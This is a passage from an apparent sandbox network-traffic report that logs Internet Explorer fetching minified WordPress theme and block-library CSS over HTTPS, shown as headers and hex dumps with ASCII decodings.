                                                                                              Data Ascii: ter-widgets input[type=submit]:focus,.footer-widgets input[type=submit]:hover,.footer-widgets .button:focus,.footer-widgets .button:hover,.woocommerce .footer-widgets button:focus,.woocommerce .footer-widgets button:hover,.woocommerce .footer-widgets inpu
                                                                                              2021-12-13 23:57:32 UTC8339INData Raw: 6f 6e 74 65 6e 74 2c 2e 73 69 64 65 62 61 72 2d 63 6f 6e 74 65 6e 74 2d 73 69 64 65 62 61 72 20 2e 63 6f 6e 74 65 6e 74 2c 2e 73 69 64 65 62 61 72 2d 73 69 64 65 62 61 72 2d 63 6f 6e 74 65 6e 74 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 34 35 30 70 78 7d 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 2d 31 2c 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 2d 32 2c 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 2d 33 2c 2e 73 69 64 65 62 61 72 2d 70 72 69 6d 61 72 79 7b 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 73 69 64 65 62 61 72 2d 73 65 63 6f 6e 64 61 72 79 7b 77 69 64 74 68 3a 31 35 30 70 78 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 30 32 33 70 78 29 7b 2e 73 69 74 65 2d 69 6e 6e 65 72
                                                                                              Data Ascii: ontent,.sidebar-content-sidebar .content,.sidebar-sidebar-content .content{width:450px}.footer-widgets-1,.footer-widgets-2,.footer-widgets-3,.sidebar-primary{width:300px}.sidebar-secondary{width:150px}}@media only screen and (max-width:1023px){.site-inner
                                                                                              2021-12-13 23:57:32 UTC8340INData Raw: 69 73 2d 6e 61 76 2d 6d 65 6e 75 3e 2e 66 69 72 73 74 3e 61 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 7d 2e 61 64 6d 69 6e 2d 62 61 72 20 6e 61 76 2e 6e 61 76 2d 70 72 69 6d 61 72 79 7b 74 6f 70 3a 30 7d 6e 61 76 2e 67 65 6e 65 73 69 73 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 67 65 6e 65 73 69 73 2d 73 6b 69 70 2d 6c 69 6e 6b 20 2e 73 6b 69 70 2d 6c 69 6e 6b 2d 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 73 69 74 65 2d 68 65 61 64 65 72 20 6e 61 76 20 2e 77 72 61 70 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 2c 2e 73 75 62 2d 6d 65 6e 75 2d
                                                                                              Data Ascii: is-nav-menu>.first>a{padding-left:20px}.admin-bar nav.nav-primary{top:0}nav.genesis-responsive-menu{display:none;position:relative}.genesis-skip-link .skip-link-hidden{display:none;visibility:hidden}.site-header nav .wrap{padding:0}.menu-toggle,.sub-menu-
                                                                                              2021-12-13 23:57:32 UTC8341INData Raw: 72 65 6c 61 74 69 76 65 7d 2e 67 65 6e 65 73 69 73 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 65 6e 75 20 2e 67 65 6e 65 73 69 73 2d 6e 61 76 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 69 74 65 6d 20 61 7b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 65 6e 65 73 69 73 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 65 6e 75 20 2e 67 65 6e 65 73 69 73 2d 6e 61 76 2d 6d 65 6e 75 20 2e 73 75 62 2d 6d 65 6e 75 7b 62 6f 72 64 65 72 3a 30 7d 2e 67 65 6e 65 73 69 73 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 65 6e 75 20 2e 67 65 6e 65 73 69 73 2d 6e 61 76 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 69 74 65 6d 3e 61 3a 66
                                                                                              Data Ascii: relative}.genesis-responsive-menu .genesis-nav-menu .menu-item a{border:0;margin-bottom:1px;margin-top:1px;padding:15px 20px;width:100%}.genesis-responsive-menu .genesis-nav-menu .sub-menu{border:0}.genesis-responsive-menu .genesis-nav-menu .menu-item>a:f
                                                                                              2021-12-13 23:57:32 UTC8342INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              7192.168.2.349764104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8221OUTGET /wp/c/5.8.2/wp-includes/css/dist/block-library/style.min.css HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8257INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a55af368e5-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176198
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"717820336e68761d59e425f4e00efa81990fb1b6d95884fe3308d404c1b3c139"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-sjc10074-SJC, cache-fra19169-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8258INData Raw: 37 66 66 32 0d 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 23 73 74 61 72 74 2d 72 65 73 69 7a 61 62 6c 65 2d 65 64 69 74 6f 72 2d 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 61 75 64 69 6f 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                                                                              Data Ascii: 7ff2@charset "UTF-8";#start-resizable-editor-section{display:none}.wp-block-audio{margin:0 0 1em}.wp-block-audio figcaption{margin-top:.5em;margin-bottom:1em}.wp-block-audio audio{width:100%;min-width:300px}.wp-block-button__link{color:#fff;background-c
                                                                                              2021-12-13 23:57:32 UTC8259INData Raw: 74 68 2d 31 30 30 3a 6f 6e 6c 79 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 40 73 75 70 70 6f 72 74 73 20 28 63 6f 6c 75 6d 6e 2d 67 61 70 3a 30 2e 35 65 6d 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 72 69 67 68 74 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 3e 2e 77
                                                                                              Data Ascii: th-100:only-child{margin-right:0;width:100%}@supports (column-gap:0.5em){.wp-block-buttons.is-content-justification-right>.wp-block-button.wp-block-button,.wp-block-buttons>.wp-block-button.wp-block-button{margin-right:0;margin-left:0}.wp-block-buttons>.w
                                                                                              2021-12-13 23:57:32 UTC8260INData Raw: 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 2e 69 73 2d 76 65 72 74 69 63 61 6c 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 3a 6c 61 73 74 2d 63 68 69 6c 64
                                                                                              Data Ascii: -block-button{margin-right:0}.wp-block-buttons.is-vertical>.wp-block-button:last-child{margin-bottom:0}.wp-block-buttons>.wp-block-button{display:inline-block;margin-left:0;margin-right:.5em;margin-bottom:.5em}.wp-block-buttons>.wp-block-button:last-child
                                                                                              2021-12-13 23:57:32 UTC8262INData Raw: 63 6b 2d 62 75 74 74 6f 6e 73 3a 6e 6f 74 28 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 2c 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 72 69 67 68 74 2c 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 6c 65 66 74 2c 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 63 65 6e 74 65 72 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b
                                                                                              Data Ascii: ck-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;margin-bottom:.5em;width:100%}.wp-block
                                                                                              2021-12-13 23:57:32 UTC8263INData Raw: 2d 77 69 64 74 68 3a 35 39 39 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 7b 66 6c 65 78 2d 62 61 73 69 73 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 38 31 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 3a 6e 6f 74 28 3a 6f 6e 6c 79 2d 63 68 69 6c 64 29 7b 66 6c 65 78 2d 62 61 73 69 73 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 65 6d 29 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37
                                                                                              Data Ascii: -width:599px){.wp-block-column{flex-basis:100%!important}}@media (min-width:600px) and (max-width:781px){.wp-block-column:not(:only-child){flex-basis:calc(50% - 1em)!important;flex-grow:0}.wp-block-column:nth-child(2n){margin-left:2em}}@media (min-width:7
                                                                                              2021-12-13 23:57:32 UTC8264INData Raw: 6b 2d 63 6f 76 65 72 2e 69 73 2d 72 65 70 65 61 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 5d 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 5d 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62
                                                                                              Data Ascii: k-cover.is-repeated{background-repeat:repeat;background-size:auto}.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){background-color:#000}.wp-block-cover-image.has-b
                                                                                              2021-12-13 23:57:32 UTC8266INData Raw: 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 32 30 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 2e 32 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 33 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e
                                                                                              Data Ascii: ckground,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{opacity:.2}.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.
                                                                                              2021-12-13 23:57:32 UTC8267INData Raw: 6d 2d 36 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 36 30 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 36 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73
                                                                                              Data Ascii: m-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has
                                                                                              2021-12-13 23:57:32 UTC8268INData Raw: 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 39 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 39 30 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 2e 39 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 31 30 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69
                                                                                              Data Ascii: -dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradi
                                                                                              2021-12-13 23:57:32 UTC8270INData Raw: 74 65 78 74 2d 63 6f 6c 6f 72 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 68 34 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 68 35 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 68 36 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 70 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 20 68 31 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 20 68 32 3a 6e
                                                                                              Data Ascii: text-color),.wp-block-cover-image h4:not(.has-text-color),.wp-block-cover-image h5:not(.has-text-color),.wp-block-cover-image h6:not(.has-text-color),.wp-block-cover-image p:not(.has-text-color),.wp-block-cover h1:not(.has-text-color),.wp-block-cover h2:n
                                                                                              2021-12-13 23:57:32 UTC8271INData Raw: 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 69 73 2d 70 6f 73 69 74 69 6f 6e 2d 62 6f 74 74 6f 6d 2d 63 65 6e 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 69 73 2d 70 6f 73 69 74 69 6f 6e 2d 62 6f 74 74 6f 6d 2d 63 65 6e 74 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 69 73 2d 70 6f 73 69 74 69 6f 6e 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 69 73 2d 70 6f 73 69 74 69 6f 6e 2d 62 6f 74 74 6f 6d 2d
                                                                                              Data Ascii: ms:flex-end;justify-content:flex-start}.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{align-items:flex-end;justify-content:center}.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-
                                                                                              2021-12-13 23:57:32 UTC8272INData Raw: 65 20 68 32 2c 73 65 63 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 68 32 20 61 2c 73 65 63 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 68 32 20 61 3a 61 63 74 69 76 65 2c 73 65 63 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 68 32 20 61 3a 66 6f 63 75 73 2c 73 65 63 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 68 32 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 6c 65 66 74 2d 63 6f 6e 74 65 6e 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 77
                                                                                              Data Ascii: e h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{color:#fff}.wp-block-cover-image .wp-block-cover.has-left-content{justify-content:flex-start}.w
                                                                                              2021-12-13 23:57:32 UTC8274INData Raw: 2f 65 6d 62 65 64 22 5d 20 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 5f 5f 77 72 61 70 70 65 72 7b 6d 69 6e 2d 77 69 64 74 68 3a 32 38 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 7b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 34 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 20 66 69 67 63 61 70 74 69 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 20 69 66 72 61 6d 65 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                                                              Data Ascii: /embed"] .wp-block-embed__wrapper{min-width:280px}.wp-block-cover .wp-block-embed{min-width:320px;min-height:240px}.wp-block-embed{margin:0 0 1em}.wp-block-embed figcaption{margin-top:.5em;margin-bottom:1em}.wp-block-embed iframe{max-width:100%}.wp-block-
                                                                                              2021-12-13 23:57:32 UTC8275INData Raw: 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 65 6d 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 70 61 64 64 69 6e 67 3a 2e 35 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 20 61 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 20 61 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 20 61 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63
                                                                                              Data Ascii: ck-file__button{background:#32373c;border-radius:2em;color:#fff;font-size:.8em;padding:.5em 1em}.wp-block-file a.wp-block-file__button{text-decoration:none}.wp-block-file a.wp-block-file__button:active,.wp-block-file a.wp-block-file__button:focus,.wp-bloc
                                                                                              2021-12-13 23:57:32 UTC8276INData Raw: 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 20 66 69 67 75 72 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 75 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 20 66 69 67 75 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 7d 7d 2e 62 6c 6f 63 6b 73
